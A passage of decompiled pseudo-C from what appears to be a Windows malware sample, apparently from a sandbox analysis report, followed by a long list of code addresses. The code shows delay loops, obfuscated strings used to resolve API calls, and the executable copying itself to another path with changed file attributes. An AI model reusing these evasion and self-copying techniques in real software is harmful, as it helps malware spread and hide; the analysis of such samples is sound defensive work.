							_t818 = memcpy(_t1279, _t1357, _t1039 << 2);
							memcpy(_t1357 + _t1039 + _t1039, _t1357, _t1178 & 0x00000003);
							E00396570(0x1f, _t818);
							_t1179 =  *0x3ce5dc; // 0x12a4
							_t1044 =  *0x3ce588; // 0xb5d5
							_t1045 =  *0x3ce34c; // 0xc60d09f3
							_t822 = _t1179 + _t1044;
							 *0x3cfb04 = 0x708;
							_t204 = _t822 + 0x5ece6a44; // 0x124db7437
							_t1181 = _t1045 + _t204;
							 *0x3ce5dc = _t1181;
							 *0x3ce34c =  *0x3ce34c - 1;
							_t1504 = _t1501 + 0x20;
							_t1257 = 0;
							while(1) {
								_t823 =  *0x3d050c; // 0x2d81058
								_t824 = E00392E30(_t823);
								_t1504 = _t1504 + 4;
								if(_t824 != 0) {
									_t1181 =  &_v1412;
									_t825 = E0039CDD8(_t1181, _t1181,  &_v84);
									_t1504 = _t1504 + 8;
									__eflags = _t825;
									if(_t825 != 0) {
										Sleep(0xd05);
										_t852 = E0039CDD8(_t1181,  &_v1412,  &_v84);
										_t1504 = _t1504 + 8;
										__eflags = _t852;
										if(_t852 != 0) {
											_v52 = _t1257;
											_v48 = _t1257;
										}
										 *0x3ce270 =  *0x3ce270 +  *0x3c8200;
									}
								} else {
									_v52 = _t1257;
									_v48 = _t1257;
								}
								_t827 = E0039B950(0);
								_t1047 = _v48;
								_t1358 = _v52;
								_t1550 = _t1181 - _t1047;
								if(_t1550 <= 0 && (_t1550 < 0 || _t827 < _t1358)) {
									_t827 = _t1358 + 0x76c;
									_t1181 = _t1047;
									asm("adc edx, edi");
								}
								_t828 = _t827 - _t1358;
								asm("sbb edx, ecx");
								_t1552 = _t1181 - _t1257;
								if(_t1552 > 0 || _t1552 >= 0 && _t828 > 0x762) {
									break;
								}
								_v20 =  *0x3ce5e4;
								 *0x3ce5e4 =  *0x3ce39c * _v20;
								asm("fld1");
								asm("faddp st1, st0");
								Sleep(0x3e8);
								_v20 =  *0x3ce2a8;
								asm("fsubr qword [ebp-0x10]");
								 *0x3ce2a8 =  *0x3ce50c -  *0x3c81f8;
								asm("fld1");
								asm("faddp st1, st0");
							}
							_t1731 =  *0x3ce3a0;
							 *0x3ce014 = E0039CABC();
							_t1349 = 0;
							while(1) {
								_t1182 =  *0x3d050c; // 0x2d81058
								_t830 = E00392E30(_t1182);
								_t1505 = _t1504 + 4;
								__eflags = _t830;
								if(_t830 == 0) {
									break;
								}
								_t848 =  *0x3d050c; // 0x2d81058
								 *0x3ce4b0 =  *0x3ce4b0 +  *0x3c81f0;
								E003896D0(_t1349, _t848);
								_t1504 = _t1505 + 4;
								_t1731 =  *0x3ce4d8 +  *0x3c81e8 -  *0x3c81e0;
								asm("fsubp st1, st0");
								 *0x3ce098 = _t1731;
								Sleep(0x7d0);
								_t1349 =  &(_t1349[0]);
								__eflags = _t1349 - 0xa;
								if(_t1349 < 0xa) {
									continue;
								}
								break;
							}
							_t831 = E0039CDD8(_t1182, _t909,  &_v84);
							_t1506 = _t1505 + 8;
							 *0x3ce498 = 0x6f4abbb1;
							__eflags = _v64 - _v32;
							if(__eflags != 0) {
								L82:
								GetModuleFileNameA(0,  &_v1412, 0x200);
								SetFileAttributesA(_t909, 0x80);
								_t1731 =  *0x3ce314 -  *0x3c81d8;
								 *0x3ce314 = _t1731;
								CopyFileA( &_v1412, _t909, 0);
								_t1349 = E0038CF90(__eflags, _t1731, 0xfe5, 0xa);
								_t837 = E00396AA0(_t909, _t836);
								_t1257 = _t837;
								E00396570(0xa, _t836);
								_t1506 = _t1506 + 0x18;
								__eflags = _t837;
								if(__eflags != 0) {
									L85:
									_t839 =  *0x3ce180; // 0x7246
									_t1051 = _t839 + 0x78fc3db0;
									__eflags = _t1051;
									 *0x3ce0c4 = _t1051;
									_push(0x80);
									L86:
									SetFileAttributesA(_t909, ??);
									L87:
									E00386260(_t1731, _t909, 0);
									_t1184 =  *0x3ce3ec; // 0x80000000
									_v8 = _t1184;
									asm("fild dword [ebp-0x4]");
									_t1478 = _t1506 + 8;
									_v20 = _t1731;
									_t1708 =  *0x3ce1b8;
									_t842 =  *0x3ce4d4; // 0x84901a2a
									_v8 = _t842;
									asm("fild dword [ebp-0x4]");
									asm("fsubp st1, st0");
									asm("fcomp qword [ebp-0x10]");
									asm("fnstsw ax");
									__eflags = _t842 & 0x00000001;
									if((_t842 & 0x00000001) == 0) {
										_t1052 =  *0x3ce1f8; // 0x3e6
										_t1185 =  *0x3ce478; // 0x80000000
										_t1186 = _t1185 + _t1052;
										__eflags = _t1186;
										_v8 = _t1186;
										asm("fild dword [ebp-0x4]");
										 *0x3ce1b8 = _t1708;
									}
									E0039DF62(0);
									goto L90;
								}
								_t1349 = E0038CF90(__eflags, _t1731, 0x2c93, 9);
								_t846 = E00396AA0(_t909, _t845);
								_t1733 =  *0x3ce5e4;
								_t1187 =  *0x3ce1fc; // 0x80000000
								_v28 = _t1733;
								_v8 = _t1187 + 0x40011bf;
								asm("fild dword [ebp-0x4]");
								_t1257 = _t846;
								_v20 = _t1733;
								asm("fsubr qword [ebp-0x10]");
								asm("fsubr qword [ebp-0x18]");
								 *0x3ce5e4 =  *0x3ce338;
								_t1731 =  *0x3ce338;
								asm("fld1");
								asm("fsubp st1, st0");
								 *0x3ce338 = _t1731;
								 *0x3ce1fc =  *0x3ce1fc + 1;
								E00396570(9, _t845);
								_t1506 = _t1506 + 0x18;
								__eflags = _t846;
								if(_t846 != 0) {
									goto L85;
								}
								_push(2);
								goto L86;
							}
							__eflags = _t831 - _t1257;
							if(__eflags == 0) {
								goto L87;
							}
							goto L82;
						}
						_v8 = LoadLibraryA(E0038CF90(__eflags, _t1708, 0x1e0b, 0xb));
						_t858 = E0038CF90(__eflags, _t1708, 0xbe3, 0xc);
						E00396570(0xb, _t856);
						_t909 = GetProcAddress(_v8, _t858);
						E00396570(0xc, _t858);
						_t1349 = E0038CF90(__eflags, _t1708, 0x1ad0, 0x202);
						_t252 =  &(_t1349[1]); // 0x4
						_t1055 = _t252;
						_t864 = _t1055;
						_t1509 = _t1498 + 0x28;
						_t253 =  &(_t864[1]); // 0x5
						_t1257 = _t253;
						do {
							_t1189 =  *_t864;
							_t864 =  &(_t864[1]);
							__eflags = _t1189;
						} while (_t1189 != 0);
						_t865 = _t864 - _t1257;
						__eflags = _t865;
						MessageBoxA(0, _t1055,  &(_t1349[1]) + _t865,  *_t1349);
						_t1056 =  *0x3ce040; // 0x80000000
						_v8 = _t1056;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1708;
						_t1708 =  *0x3ce450 + _v20;
						 *0x3ce040 = E0039CABC();
						E00396570(0x202, _t1349);
						_t1481 = _t1509 + 8;
						E0039DF62(0); // executed
						goto L104;
					}
					_t871 =  *0x3ce3d4; // 0x977dff82
					_v8 = _t871;
					asm("fild dword [ebp-0x4]");
					_v8 = _t1708;
					 *0x3ce3d4 = E0039CABC();
					_t1708 =  *0x3ce054;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce054 = _t1708;
					_t909 = E00396AA0(_t1257 + 0xc, E0038CF90(_t1541, _t1708, 0x1593, 2));
					E00396570(2, _t873);
					_t1498 = _t1478 + 0x18;
					_t1542 = _t909;
					if(_t909 != 0) {
						goto L54;
					}
					goto L53;
				} else {
					E003C28A9(GetTickCount(), _t717, 0x24);
					 *0x3ce1e8 =  *0x3ce1e8 + 1;
					_t1756 =  *0x3ce520;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce520 = _t1756;
					_t1191 =  *0x3ce1e8; // 0xa3c3
					_v8 = _t1191;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1756;
					asm("fsubr qword [ebp-0x10]");
					_v20 =  *0x3ce520 -  *0x3c8214;
					_t1700 =  *0x3ce360 + _v20;
					 *0x3ce360 =  *0x3ce360 + _v20;
					_t1057 = E0038CF90( *0x3ce1e8,  *0x3ce360 + _v20, 0x2c9e, 2);
					_t1510 = _t1477 + 0x14;
					_t1361 = _t1057;
					do {
						_t1192 =  *_t1057;
						_t1057 = _t1057 + 1;
					} while (_t1192 != 0);
					_t1286 =  *0x3cfc74; // 0x2d811b0
					_t1193 = _t1057 - _t1361;
					_t1287 = _t1286 - 1;
					do {
						_t1059 =  *(_t1287 + 1);
						_t1287 = _t1287 + 1;
					} while (_t1059 != 0);
					_t1061 = _t1193 >> 2;
					_t880 = memcpy(_t1287, _t1361, _t1061 << 2);
					memcpy(_t1361 + _t1061 + _t1061, _t1361, _t1193 & 0x00000003);
					E00396570(2, _t880);
					_t1477 = _t1510 + 0x20;
					 *0x3cfc84 = 1; // executed
					goto L49;
				}
			}

0x0038138a
0x0038138d
0x00381393
0x0038139d
0x003813a0
0x003813ae
0x003813bb
0x003813cd
0x003813d3
0x003813d9
0x003813e1
0x003813ec
0x003813f2
0x003813fe
0x00381402
0x00381404
0x0038140a
0x00381410
0x0038141b
0x0038141e
0x00381421
0x00381429
0x0038142e
0x00381441
0x00381447
0x0038144d
0x00381453
0x00381459
0x0038145f
0x00381465
0x0038146b
0x00381471
0x00381477
0x0038147d
0x00381483
0x0038148f
0x00381495
0x0038149e
0x003814a1
0x003814a4
0x003814a7
0x003814aa
0x003814b9
0x003814c2
0x003814c5
0x003814c8
0x003814ca
0x003814cf
0x00381511
0x003814d1
0x003814d9
0x003814e5
0x003814ee
0x003814f1
0x003814f7
0x003814fa
0x003814fd
0x00381503
0x00381509
0x00381509
0x00381513
0x00381519
0x0038151c
0x0038151f
0x00381525
0x0038152b
0x00381531
0x00381537
0x0038153d
0x00381543
0x00381549
0x00381554
0x00381559
0x0038155c
0x00381561
0x00381563
0x00381565
0x0038156e
0x00381571
0x00381574
0x00381589
0x0038158b
0x00381593
0x00381599
0x0038159f
0x003815a2
0x003815a4
0x003815aa
0x003815aa
0x003815b6
0x003815bb
0x003815c8
0x003815cd
0x003815d5
0x003815e2
0x003815e5
0x003815f6
0x00381607
0x00381611
0x00381616
0x00381627
0x00381631
0x00381634
0x00381640
0x00381652
0x00381666
0x0038166b
0x00381677
0x0038167c
0x0038168d
0x00381692
0x0038169d
0x003816a8
0x003816ad
0x003816b5
0x003816bb
0x003816c0
0x003816cb
0x003816db
0x003816e0
0x003816ea
0x003816f2
0x00381703
0x00381708
0x00381712
0x00381717
0x00381726
0x0038172b
0x0038173a
0x00381744
0x00381749
0x0038175c
0x00381761
0x0038176b
0x00381770
0x00381784
0x00381789
0x0038178e
0x00381794
0x00381797
0x0038179c
0x003817a5
0x003817b0
0x003817b5
0x003817ba
0x003817cd
0x003817d2
0x003817dc
0x003817e1
0x003817f0
0x003817fa
0x003817ff
0x00381812
0x00381818
0x0038181b
0x00381824
0x00381827
0x0038182d
0x00381832
0x00381846
0x0038184b
0x00381855
0x0038185a
0x00381860
0x00381865
0x00381875
0x00381878
0x0038187d
0x0038188c
0x00381891
0x0038189b
0x003818a0
0x003818b3
0x003818b8
0x003818c2
0x003818c7
0x003818db
0x003818e8
0x003818ea
0x003818ef
0x00381906
0x00381909
0x0038190b
0x00381912
0x00381912
0x00381918
0x00381929
0x0038192e
0x00381938
0x0038193d
0x00381951
0x00381956
0x00381960
0x00381965
0x00381978
0x0038197d
0x00381987
0x0038198c
0x003819a0
0x003819a5
0x003819af
0x003819b4
0x003819c8
0x003819cd
0x003819d7
0x003819e2
0x003819ec
0x003819f8
0x00381a04
0x00381a13
0x00381a18
0x00381a22
0x00381a27
0x00381a3b
0x00381a40
0x00381a4a
0x00381a4f
0x00381a6a
0x00381a74
0x00381a7a
0x00381a80
0x00381a8a
0x00381a8f
0x00381aa2
0x00381aa7
0x00381ab1
0x00381ab6
0x00381aca
0x00381acf
0x00381ad9
0x00381ade
0x00381af2
0x00381af7
0x00381afe
0x00381b0d
0x00381b13
0x00381b16
0x00381b1c
0x00381b23
0x00381b28
0x00381b3c
0x00381b41
0x00381b4b
0x00381b50
0x00381b63
0x00381b68
0x00381b72
0x00381b7e
0x00381b87
0x00381b8f
0x00381b9c
0x00381bac
0x00381bb1
0x00381bbb
0x00381bc0
0x00381bca
0x00381bcc
0x00381bda
0x00381bdf
0x00381bfd
0x00381c0c
0x00381c12
0x00381c15
0x00381c1e
0x00381c21
0x00381c27
0x00381c2e
0x00381c33
0x00381c47
0x00381c4c
0x00381c56
0x00381c65
0x00381c6b
0x00381c6e
0x00381c72
0x00381c78
0x00381c7f
0x00381c88
0x00381c8d
0x00381c99
0x00381c9f
0x00381ca2
0x00381cac
0x00381cb4
0x00381cbe
0x00381cc3
0x00381cd6
0x00381cdb
0x00381ce5
0x00381cea
0x00381cfe
0x00381d03
0x00381d0d
0x00381d12
0x00381d26
0x00381d2b
0x00381d3e
0x00381d50
0x00381d64
0x00381d69
0x00381d72
0x00381d81
0x00381d86
0x00381d90
0x00381d95
0x00381da9
0x00381dae
0x00381db8
0x00381dbd
0x00381dd6
0x00381ddb
0x00381de8
0x00381df3
0x00381dfd
0x00381e02
0x00381e15
0x00381e1a
0x00381e24
0x00381e29
0x00381e3d
0x00381e42
0x00381e4a
0x00381e4c
0x00381e51
0x00381e57
0x00381e5e
0x00381e63
0x00381e68
0x00381e6b
0x00381e6e
0x00381e7a
0x00381e80
0x00381e86
0x00381e89
0x00381e8c
0x00381e8f
0x00381e98
0x00381e9b
0x00381e9e
0x00381ea0
0x00381ea3
0x00381ea5
0x00381ea5
0x00381eb6
0x00381ec0
0x00381ec5
0x00381ed9
0x00381ede
0x00381ef4
0x00381efa
0x00381eff
0x00381f13
0x00381f18
0x00381f22
0x00381f27
0x00381f3b
0x00381f40
0x00381f4a
0x00381f4f
0x00381f62
0x00381f67
0x00381f71
0x00381f76
0x00381f8a
0x00381f8f
0x00381f99
0x00381f9e
0x00381fab
0x00381fb7
0x00381fc1
0x00381fc6
0x00381fd9
0x00381fde
0x00381fe8
0x00381fed
0x00382001
0x0038200b
0x00382010
0x00382013
0x00382018
0x0038202c
0x00382036
0x0038203e
0x0038204f
0x0038205e
0x00382060
0x00382062
0x00382068
0x0038206a
0x00382072
0x00382075
0x00382083
0x0038208c
0x0038208f
0x0038208f
0x00382095
0x003820a6
0x003820ab
0x003820b5
0x003820ba
0x003820d3
0x003820e5
0x003820f1
0x00382103
0x00382109
0x00382113
0x00382118
0x0038212b
0x00382130
0x0038213a
0x0038213f
0x0038214a
0x0038214c
0x00382152
0x00382159
0x0038215c
0x00382164
0x0038216e
0x00382171
0x0038217a
0x0038217d
0x00382180
0x00382186
0x00382190
0x00382195
0x003821a9
0x003821ae
0x003821b8
0x003821bd
0x003821d1
0x003821d6
0x003821e0
0x003821e5
0x003821f8
0x003821fd
0x00382207
0x00382213
0x00382224
0x00382234
0x00382239
0x00382243
0x00382248
0x0038225b
0x00382260
0x0038226a
0x0038226f
0x00382283
0x00382288
0x00382292
0x00382297
0x003822ab
0x003822b0
0x003822ba
0x003822bf
0x003822d2
0x003822d7
0x003822e1
0x003822e6
0x003822fa
0x003822ff
0x00382309
0x00382312
0x0038231b
0x00382320
0x00382325
0x00382328
0x0038232f
0x00382338
0x0038233d
0x00382349
0x0038234f
0x00382352
0x00382363
0x0038236a
0x00382370
0x00382376
0x0038237c
0x0038237f
0x00382382
0x00382385
0x0038238a
0x00382393
0x00382399
0x00382399
0x003823a1
0x003823a6
0x003823a6
0x003823b0
0x003823b5
0x003823cb
0x003823d0
0x003823d5
0x003823e4
0x003823e9
0x003823fc
0x00382401
0x0038240b
0x00382410
0x00382424
0x00382429
0x00382433
0x00382438
0x0038244c
0x00382451
0x0038245b
0x00382460
0x00382473
0x0038247d
0x00382482
0x00382485
0x0038248a
0x00382495
0x0038249d
0x003824a3
0x003824aa
0x003824c0
0x003824c2
0x003824c7
0x003824cc
0x003824d1
0x003824d4
0x003824d7
0x003824da
0x003824dd
0x003824e3
0x003824ed
0x003824f5
0x003824fc
0x003824ff
0x00382501
0x00382504
0x00382506
0x00382508
0x0038251e
0x00382530
0x0038253c
0x0038253f
0x00382542
0x00382545
0x00382548
0x0038254a
0x00382550
0x00382552
0x00382554
0x0038255a
0x0038255d
0x0038255f
0x00382566
0x0038256c
0x00382579
0x00382579
0x0038257f
0x00382582
0x00382585
0x00382585
0x0038250a
0x00382516
0x00382516
0x0038258b
0x00382594
0x00382599
0x0038259f
0x003825ac
0x003825af
0x003825b9
0x003825c5
0x003825d1
0x003825dd
0x003825df
0x003825e7
0x003825f1
0x003825f6
0x00382609
0x0038260e
0x00382613
0x00382620
0x0038262a
0x00382639
0x00382642
0x00382648
0x0038264b
0x00382657
0x00382664
0x00382673
0x00382678
0x0038268e
0x00382694
0x00382699
0x003826ad
0x003826b2
0x003826bc
0x003826c1
0x003826cc
0x003826d4
0x003826dc
0x003826e6
0x003826ec
0x003826f6
0x003826fb
0x0038270e
0x00382713
0x00382718
0x00382722
0x00382727
0x0038272a
0x00382733
0x00382738
0x0038273b
0x00382744
0x00382747
0x00382752
0x00382766
0x0038276c
0x00382773
0x00382778
0x0038278c
0x00382791
0x0038279b
0x003827a0
0x003827b4
0x003827b9
0x003827c3
0x003827c8
0x003827db
0x003827e0
0x003827ea
0x003827ef
0x00382803
0x00382808
0x00382810
0x00382812
0x0038281d
0x00382823
0x0038282d
0x0038283d
0x00382847
0x00382849
0x00382859
0x0038285c
0x0038285f
0x00382862
0x0038286b
0x00382871
0x00382877
0x0038287a
0x0038287d
0x00382882
0x00382884
0x0038288c
0x00382892
0x00382898
0x0038289b
0x003828c3
0x003828d2
0x003828d5
0x003828d7
0x003828d9
0x003828dc
0x003828eb
0x003828ed
0x003828f3
0x003828f3
0x0038289d
0x003828a9
0x003828a9
0x003828f8
0x00382901
0x00382907
0x0038290d
0x00382910
0x00382915
0x0038291f
0x00382925
0x0038292f
0x00382934
0x00382940
0x00382945
0x0038294c
0x00382967
0x00382973
0x0038297d
0x00382982
0x0038298c
0x0038299f
0x003829a4
0x003829ac
0x003829ae
0x003829b3
0x003829c7
0x003829cc
0x003829d7
0x003829d9
0x003829dd
0x003829e0
0x003829e2
0x003829e4
0x003829f0
0x00382a02
0x00382a04
0x00382a0c
0x00382a0e
0x00382a14
0x00382a17
0x00382a3b
0x00382a41
0x00382a53
0x00382a59
0x00382a5b
0x00382a19
0x00382a19
0x00382a20
0x00382a2f
0x00382a31
0x00382a37
0x00382a37
0x00382a64
0x00382a69
0x00382a7c
0x00382a81
0x00382a8b
0x00382a90
0x00382aa4
0x00382aa9
0x00382ab1
0x00382ab3
0x00382ab8
0x00382ad1
0x00382add
0x00382ae9
0x00382aee
0x00382af4
0x00382afd
0x00382b00
0x00382b0c
0x00382b0f
0x00382b1b
0x00382b1d
0x00382b30
0x00382b32
0x00382b34
0x00382b37
0x00382b39
0x00382b3b
0x00382b41
0x00382b47
0x00382b4a
0x00382b4d
0x00382b50
0x00382b56
0x00382b5c
0x00382b62
0x00382b65
0x00382b68
0x00382b6b
0x00382b74
0x00382b7b
0x00382b7e
0x00382b81
0x00382b89
0x00382b8b
0x00382b94
0x00382bcc
0x00382b96
0x00382b96
0x00382b9c
0x00382ba8
0x00382bae
0x00382bb4
0x00382bb7
0x00382bba
0x00382bc5
0x00382bc5
0x00382bd1
0x00382bd6
0x00382bdd
0x00382be3
0x00382be9
0x00382bec
0x00382bf5
0x00382bf8
0x00382bfb
0x00382bfe
0x00382c04
0x00382c0a
0x00382c0d
0x00382c10
0x00382c13
0x00382c15
0x00382c18
0x00382c20
0x00382c26
0x00382c26
0x00382c2c
0x00382c3c
0x00382c41
0x00382c4b
0x00382c50
0x00382c64
0x00382c69
0x00382c73
0x00382c78
0x00382c8c
0x00382c91
0x00382c98
0x00382ca4
0x00382ca7
0x00382cad
0x00382cb9
0x00382cbf
0x00382cc5
0x00382cca
0x00382cde
0x00382ce3
0x00382ced
0x00382cf2
0x00382d05
0x00382d0a
0x00382d12
0x00382d14
0x00382d19
0x00382d1f
0x00382d24
0x00382d2c
0x00382d31
0x00382d37
0x00382d3d
0x00382d40
0x00382d43
0x00382d46
0x00382d49
0x00382d52
0x00382d58
0x00382d5b
0x00382d63
0x00382d69
0x00382d6f
0x00382d75
0x00382d78
0x00382d7a
0x00382d83
0x00382d86
0x00382d89
0x00382d98
0x00382da4
0x00382dac
0x00382db2
0x00382db8
0x00382dba
0x00382dbc
0x00382dbc
0x00382dc9
0x00382dce
0x00382dda
0x00382ddd
0x00382de5
0x00382dee
0x00382df1
0x00382df7
0x00382dfc
0x00382e0f
0x00382e14
0x00382e1e
0x00382e23
0x00382e37
0x00382e3c
0x00382e46
0x00382e4b
0x00382e5f
0x00382e64
0x00382e6e
0x00382e73
0x00382e86
0x00382e93
0x00382e95
0x00382e9a
0x00382ea0
0x00382ea9
0x00382eab
0x00382eb2
0x00382eb8
0x00382ecc
0x00382ece
0x00382ed0
0x00382eda
0x00382edd
0x00382ee0
0x00382ee9
0x00382ef2
0x00382efb
0x00382efe
0x00382f09
0x00382f14
0x00382f1a
0x00382f1a
0x00382ece
0x00382f20
0x00382f31
0x00382f36
0x00382f40
0x00382f45
0x00382f58
0x00382f5d
0x00382f69
0x00382f73
0x00382f78
0x00382f8c
0x00382f91
0x00382f9b
0x00382fa0
0x00382fb3
0x00382fb8
0x00382fc2
0x00382fc7
0x00382fdb
0x00382fe0
0x00382fe8
0x00382fea
0x00382fef
0x00383003
0x0038300d
0x0038300f
0x00383018
0x0038301b
0x0038301e
0x00383021
0x0038302a
0x0038303a
0x00383040
0x00383048
0x0038304a
0x0038304c
0x0038304e
0x00383057
0x003830a5
0x00383059
0x00383059
0x0038305f
0x00383065
0x0038306b
0x0038306e
0x00383071
0x00383083
0x00383089
0x0038308b
0x0038308e
0x00383090
0x00383097
0x0038309d
0x0038309d
0x0038308e
0x003830aa
0x003830bb
0x003830c1
0x003830c7
0x003830ca
0x003830d5
0x003830e0
0x003830e2
0x003830e8
0x003830fb
0x00383100
0x0038310a
0x0038310f
0x00383122
0x00383127
0x0038312f
0x00383131
0x00383136
0x00383146
0x00383150
0x0038315c
0x00383167
0x00383178
0x00383183
0x0038318f
0x00383191
0x00383199
0x003831a2
0x003831a7
0x003831b0
0x003831bb
0x003831c0
0x003831cc
0x003831d2
0x003831d7
0x003831dd
0x003831e3
0x003831e9
0x003831ec
0x003831f1
0x003831f4
0x003831f7
0x003831fa
0x003831fd
0x00383203
0x00383206
0x00383209
0x00383212
0x00383218
0x0038321b
0x0038321e
0x00383220
0x00383223
0x00383225
0x0038322c
0x0038322f
0x00383232
0x00383235
0x0038323e
0x00383241
0x00383241
0x0038324d
0x00383253
0x00383255
0x0038325a
0x0038325f
0x00383264
0x00383274
0x00383266
0x0038326d
0x0038326d
0x0038327e
0x00383287
0x0038328a
0x00383294
0x00383297
0x003832a0
0x003832a8
0x003832ae
0x003832b6
0x0038336d
0x0038336d
0x00383378
0x00383384
0x00383387
0x0038338a
0x00383392
0x00383398
0x003833b0
0x003833b2
0x003833be
0x003833ca
0x003833cc
0x003833ce
0x003833d0
0x003833d6
0x003833dc
0x003833e2
0x003833e2
0x003833e4
0x003833e7
0x003833e8
0x003833e8
0x003833f8
0x0038340a
0x0038340c
0x00383411
0x00383414
0x00383416
0x003838b0
0x003838b7
0x003838c2
0x003838c5
0x003838c5
0x003838c7
0x003838c7
0x003838c9
0x003838cc
0x003838cd
0x003838cd
0x003838df
0x003838e5
0x003838f2
0x003838f7
0x003838ff
0x00383902
0x00383902
0x00383904
0x00383904
0x00383906
0x00383909
0x0038390a
0x0038390a
0x0038390e
0x00383916
0x00383916
0x00383918
0x00383918
0x0038391a
0x0038391d
0x0038391e
0x0038391e
0x00383926
0x0038392f
0x00383934
0x00383937
0x0038393e
0x00383a6d
0x00383a6d
0x00383a73
0x00383a74
0x00383a79
0x00383a7c
0x00383a7f
0x00383a87
0x00383a8b
0x00383a8d
0x00383a8f
0x00383a9b
0x00383a9e
0x00383aa4
0x00383aaa
0x00383ab0
0x00383ab3
0x00383ab6
0x00383ab9
0x00383ac1
0x00383ac7
0x00383acf
0x00383ad5
0x00383ad5
0x00383ada
0x00383aed
0x00383af6
0x00383af9
0x00383aff
0x00383b04
0x00383b11
0x00383b16
0x00383b1b
0x00383b1e
0x00383b1e
0x00383b20
0x00383b20
0x00383b27
0x00383b2d
0x00383b2e
0x00383b2e
0x00383b32
0x00383b37
0x00383b40
0x00383b40
0x00383b42
0x00383b43
0x00383b43
0x00383b4c
0x00383b4e
0x00383b50
0x00383b50
0x00383b51
0x00383b51
0x00383b54
0x00383b55
0x00383b55
0x00383b5b
0x00383b67
0x00383b67
0x00383b6a
0x00383b6a
0x00383b6c
0x00383b70
0x00383b70
0x00383b72
0x00383b73
0x00383b73
0x00383b7d
0x00383b7f
0x00383b81
0x00383b81
0x00383b82
0x00383b82
0x00383b85
0x00383b86
0x00383b86
0x00383b8c
0x00383b8f
0x00383b9a
0x00383ba2
0x00383ba2
0x00383ba2
0x00383baa
0x00383bac
0x00383bb5
0x00383bba
0x00383bbd
0x00383bbe
0x00383bbe
0x00383bc3
0x00383bca
0x00383bd1
0x00383bd6
0x00383bd9
0x00383bdb
0x00383be3
0x00383bf2
0x00383bf5
0x00383bf7
0x00383bfd
0x00383c03
0x00383c05
0x00383c0d
0x00383c12
0x00383c14
0x00383c17
0x00383c17
0x00383c1c
0x00383c27
0x00383c2a
0x00383c30
0x00383c33
0x00383c33
0x00383c39
0x00383c49
0x00383c52
0x00383c55
0x00383c5b
0x00383c62
0x00383c69
0x00383c6e
0x00383c71
0x00383c73
0x00383d2c
0x00383d2c
0x00383d2c
0x00383d30
0x00383d30
0x00383d3a
0x00383d3d
0x00383d40
0x00383d49
0x00383d4f
0x00383d53
0x00383d59
0x00383d5e
0x00383d61
0x00383d63
0x00000000
0x00000000
0x00383d65
0x00383d6c
0x00383d71
0x00383d79
0x00383d7f
0x00383d80
0x00383d83
0x00000000
0x00000000
0x00000000
0x00383d83
0x00383d8f
0x00383da3
0x00383db0
0x00383dbd
0x00383dc9
0x00383dd1
0x00383dd3
0x00383dd5
0x00383dd5
0x00383dd7
0x00383dd8
0x00383dd8
0x00383de2
0x00383de4
0x00383de6
0x00383de6
0x00383de7
0x00383de7
0x00383dea
0x00383deb
0x00383deb
0x00383df1
0x00383df8
0x00383e02
0x00383e02
0x00383e04
0x00383e0e
0x00383e1b
0x00383e23
0x00383e2e
0x00383e34
0x00383e3d
0x00383e40
0x00383e46
0x00383e49
0x00383e4c
0x00383e4e
0x00383e51
0x00383e59
0x00383e5f
0x00383e5f
0x00383e65
0x00383e6b
0x00383e73
0x00383e7f
0x00383e8d
0x00383e92
0x00383e9e
0x00383ea1
0x00383eaa
0x00383ead
0x00383ec5
0x00383ecb
0x00383ed1
0x00383ed9
0x00383ee1
0x00383ef0
0x00383f06
0x00383f19
0x00383f30
0x00383f36
0x00383f3d
0x00383f42
0x00383f44
0x00383f4e
0x00383f5b
0x00383f5b
0x00383f5d
0x00383f64
0x00383f64
0x00383f70
0x00383f75
0x00000000
0x00383c79
0x00383c79
0x00383c80
0x00383c92
0x00383ca8
0x00383cae
0x00383cb0
0x00383d16
0x00383d16
0x00383d1d
0x00383d22
0x00383d27
0x00000000
0x00383d27
0x00383cbb
0x00383cc1
0x00383cc8
0x00383ceb
0x00383cf2
0x00383cf7
0x00383cfa
0x00383cff
0x00383d0e
0x00383d13
0x00000000
0x00383d13
0x00383cd1
0x00383cd6
0x00383cd9
0x00383ce0
0x00000000
0x00000000
0x00383ce2
0x00383ce9
0x00000000
0x00000000
0x00000000
0x00383ce9
0x00383c73
0x00383944
0x00383952
0x00383957
0x0038395a
0x0038395c
0x00000000
0x00000000
0x0038396d
0x00383972
0x00383975
0x00383977
0x00000000
0x00000000
0x00383988
0x0038398d
0x00383990
0x00383992
0x00000000
0x00000000
0x003839a3
0x003839a8
0x003839ab
0x003839b0
0x003839b7
0x00383476
0x00383478
0x0038347d
0x00383484
0x00383496
0x00383498
0x0038349d
0x003834a0
0x003834a2
0x003834a5
0x003834a5
0x003834b1
0x003834b4
0x003834b9
0x003834bf
0x003834c2
0x003834c5
0x003834c8
0x003834da
0x003834dc
0x003834de
0x003834e4
0x003834e6
0x003834ee
0x003834f1
0x003834f9
0x00383508
0x0038350b
0x00383511
0x00383514
0x00383517
0x0038351f
0x0038351f
0x00383531
0x00383533
0x00383536
0x00383538
0x00383538
0x0038353a
0x0038353b
0x00383547
0x00383549
0x00383550
0x00383550
0x00383553
0x00383554
0x0038355a
0x0038355d
0x00383567
0x00383569
0x0038356e
0x00383575
0x00383582
0x00383588
0x0038358a
0x00383594
0x00383594
0x0038359b
0x003835a2
0x003835a8
0x003835ab
0x003835b0
0x003835b0
0x003835b6
0x003835bb
0x003835c0
0x003835ce
0x003835d5
0x003835da
0x003835dd
0x003835df
0x003835e6
0x003835f7
0x003835fc
0x003835ff
0x00383601
0x00383603
0x00383606
0x00383606
0x00383615
0x00383615
0x003835c2
0x003835c2
0x003835c5
0x003835c5
0x0038361d
0x00383622
0x00383625
0x00383628
0x0038362a
0x00383634
0x00383639
0x0038363b
0x0038363b
0x0038363d
0x0038363f
0x00383641
0x00383643
0x00000000
0x00000000
0x00383659
0x00383665
0x00383671
0x00383673
0x0038367b
0x00383687
0x00383696
0x00383699
0x003836a5
0x003836a7
0x003836a7
0x003836b4
0x003836bf
0x003836c5
0x003836d0
0x003836d0
0x003836d7
0x003836dc
0x003836df
0x003836e1
0x00000000
0x00000000
0x003836e9
0x003836f5
0x003836fb
0x00383706
0x0038371a
0x00383720
0x00383722
0x00383728
0x0038372e
0x0038372f
0x00383732
0x00000000
0x00000000
0x00000000
0x00383732
0x00383739
0x00383741
0x00383744
0x0038374e
0x00383751
0x0038375b
0x00383769
0x00383775
0x00383781
0x00383791
0x00383797
0x003837a9
0x003837ad
